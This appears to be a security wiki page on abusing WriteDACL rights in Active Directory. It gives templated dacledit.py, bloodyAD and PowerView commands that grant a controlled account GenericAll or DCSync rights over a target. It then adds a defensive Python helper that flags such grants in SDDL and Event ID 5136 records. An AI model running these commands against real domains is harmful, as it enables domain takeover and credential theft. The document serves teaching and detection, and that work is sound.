Theory
WriteDACL
This ACL permission allows its holder to add, delete or modify any ACE in the target object's ACL, which can then be leveraged to compromise that object in many ways (e.g. by granting GenericAll or DCSync rights, as below).
Furthermore, if the attacker-controlled account holds the WriteOwner right over the target, it can grant itself the WriteDACL right on that object as well.
Abuse - UNIX-like
Impacket’s dacledit.py
Grant FullControl (GenericAll) Right
GenericAll
dacledit.py -dc-ip '<DC>' -principal '<CONTROLLED_OBJECT>' -target '<TARGET_OBJECT>' -action write -rights FullControl '<DOMAIN>/<USER>:<PASSWD>'
Grant DCSync Rights
DS-Replication-Get-Changes DS-Replication-Get-Changes-All
dacledit.py -dc-ip '<DC>' -principal '<CONTROLLED_OBJECT>' -target '<TARGET_OBJECT>' -action write -rights DCSync '<DOMAIN>/<USER>:<PASSWD>'
BloodyAD
Setup
git clone https://github.com/CravateRouge/bloodyAD bloodyAD
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txt
Usage
- FullControl (GenericAll) Right
python3 bloodyAD.py --domain '<DOMAIN>' --username '<USER>' --password '<PASSWD>' --dc-ip '<DC_IP>' add genericAll '<TARGET_ACCOUNT>' '<CONTROLLED_ACCOUNT>'
- DCSync Rights
python3 bloodyAD.py --domain '<DOMAIN>' --username '<USER>' --password '<PASSWD>' --dc-ip '<DC_IP>' add dcsync '<CONTROLLED_ACCOUNT>'
Abuse - Windows
Powerview
Grant FullControl Right
GenericAll
$passwd = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWD>'
$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $passwd)
Add-DomainObjectACL -Credential $cred -Rights 'All' -PrincipalIdentity '<CONTROLLED_OBJECT>' -TargetIdentity '<TARGET_OBJECT>'
Grant DCSync Rights
DS-Replication-Get-Changes DS-Replication-Get-Changes-All
$passwd = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWD>'
$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $passwd)
Add-DomainObjectACL -Credential $cred -Rights 'DCSync' -PrincipalIdentity '<CONTROLLED_OBJECT>' -TargetIdentity '<TARGET_OBJECT>'
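The defensive counterpart to the Theory section and to the dacledit.py / bloodyAD / PowerView commands above is finding out who already holds these rights, and noticing when someone gains them. The following Python is an added example, not code from this page, from Impacket, bloodyAD or PowerView: it parses an AD security descriptor in SDDL form, flags allow ACEs that grant WriteDACL, WriteOwner, GenericAll or the DCSync extended rights to trustees outside an assumed allow-list (EXPECTED_TRUSTEES), and applies the same check to the new nTSecurityDescriptor value carried by a Windows Event ID 5136 record. The domain SID, RIDs, the 5136 record and its field layout are constructed for the example; the DCSync GUIDs are the well-known schema values.

```python
"""Added defensive audit helper (not part of dacledit.py, bloodyAD or
PowerView): finds ACEs that grant the DACL-abuse primitives discussed
above (WriteDACL, WriteOwner, GenericAll, DCSync) to unexpected trustees,
either in a security descriptor's SDDL string or in the new
nTSecurityDescriptor value carried by a Windows Event ID 5136 record."""
import re

# Extended-rights GUIDs behind DCSync (well-known AD schema values).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DCSYNC_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# SDDL right codes that matter here, with their access-mask bits.
RIGHT_BITS = {
    "GA": 0x10000000,  # GENERIC_ALL
    "WD": 0x00040000,  # WRITE_DAC   (WriteDACL)
    "WO": 0x00080000,  # WRITE_OWNER
    "CR": 0x00000100,  # ADS_RIGHT_DS_CONTROL_ACCESS (extended rights)
}

# Trustees expected to hold such rights: an assumed allow-list that a real
# audit would extend with its own Tier-0 principals.
EXPECTED_TRUSTEES = {"DA", "EA", "BA", "SY"}


def decode_rights(field):
    """Turn an SDDL rights field (two-letter codes or 0x hex mask) into a mask."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        mask |= RIGHT_BITS.get(field[i:i + 2], 0)  # other codes are irrelevant here
    return mask


def audit_sddl(sddl):
    """Return (trustee, primitive) pairs for every allow ACE that grants an
    abusable right to a trustee outside EXPECTED_TRUSTEES."""
    findings = []
    for ace in re.findall(r"\(([^()]*)\)", sddl):
        fields = ace.split(";")
        if len(fields) < 6:
            continue
        ace_type, _flags, rights, obj_guid, _inh_guid, trustee = fields[:6]
        if ace_type not in ("A", "OA") or trustee in EXPECTED_TRUSTEES:
            continue  # deny ACEs and expected admins are not abuse paths
        mask = decode_rights(rights)
        if mask & RIGHT_BITS["GA"]:
            findings.append((trustee, "GenericAll"))
            continue  # GenericAll already implies everything below
        if mask & RIGHT_BITS["WD"]:
            findings.append((trustee, "WriteDACL"))
        if mask & RIGHT_BITS["WO"]:
            findings.append((trustee, "WriteOwner"))
        if mask & RIGHT_BITS["CR"]:
            guid = obj_guid.lower()
            if guid == "":
                findings.append((trustee, "AllExtendedRights"))
            elif guid in DCSYNC_GUIDS:
                findings.append((trustee, "DCSync:" + guid))
    return findings


def audit_5136_event(event):
    """Apply audit_sddl to a 5136 (directory object modified) record whose
    changed attribute is nTSecurityDescriptor. The record is a dict of the
    event's EventData fields; the value is assumed to be in SDDL form, as in
    the constructed sample below."""
    if event.get("AttributeLDAPDisplayName", "").lower() != "ntsecuritydescriptor":
        return []
    if event.get("OperationType") != "%%14674":  # %%14674 = Value Added
        return []
    who = f'{event.get("SubjectDomainName", "")}\\{event.get("SubjectUserName", "")}'
    return [(event.get("ObjectDN", ""), who, trustee, primitive)
            for trustee, primitive in audit_sddl(event.get("AttributeValue", ""))]


DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed
SAMPLE_SDDL = (  # constructed descriptor mixing expected and suspicious ACEs
    "O:DAG:DAD:AI"
    "(A;;GA;;;DA)"                                # Domain Admins: expected
    "(A;;RPWPCCDCLCSWRCWDWOGA;;;BA)"              # builtin Administrators: expected
    "(A;;RPLCLORC;;;AU)"                          # Authenticated Users read-only: fine
    f"(A;;WD;;;{DOMAIN_SID}-1105)"                # plain user holds WriteDACL
    f"(OA;;CR;{DS_REPLICATION_GET_CHANGES};;{DOMAIN_SID}-1106)"
    f"(OA;;CR;{DS_REPLICATION_GET_CHANGES_ALL};;{DOMAIN_SID}-1106)"  # DCSync pair
    f"(A;;0x000F01FF;;;{DOMAIN_SID}-1107)"        # full control via hex mask
    f"(D;;WDWO;;;{DOMAIN_SID}-1108)"              # deny ACE: not an abuse path
)
SAMPLE_5136 = {  # constructed 5136 record, keyed by EventData field names
    "SubjectDomainName": "CORP", "SubjectUserName": "jdoe",
    "ObjectDN": "DC=corp,DC=local",
    "AttributeLDAPDisplayName": "nTSecurityDescriptor",
    "OperationType": "%%14674",
    "AttributeValue": SAMPLE_SDDL,
}

if __name__ == "__main__":
    for row in audit_5136_event(SAMPLE_5136):
        print("object=%s changed_by=%s trustee=%s grants=%s" % row)
```

Two caveats for using this for real: Event ID 5136 is only written when the "Audit Directory Service Changes" subcategory is enabled and the object carries a SACL covering the write, so the state check (pulling nTSecurityDescriptor over LDAP and running audit_sddl on it) is the safety net when the change log is missing; and rights are usually granted to groups, so trustee SIDs should be resolved and expanded through nested membership before deciding a finding is benign.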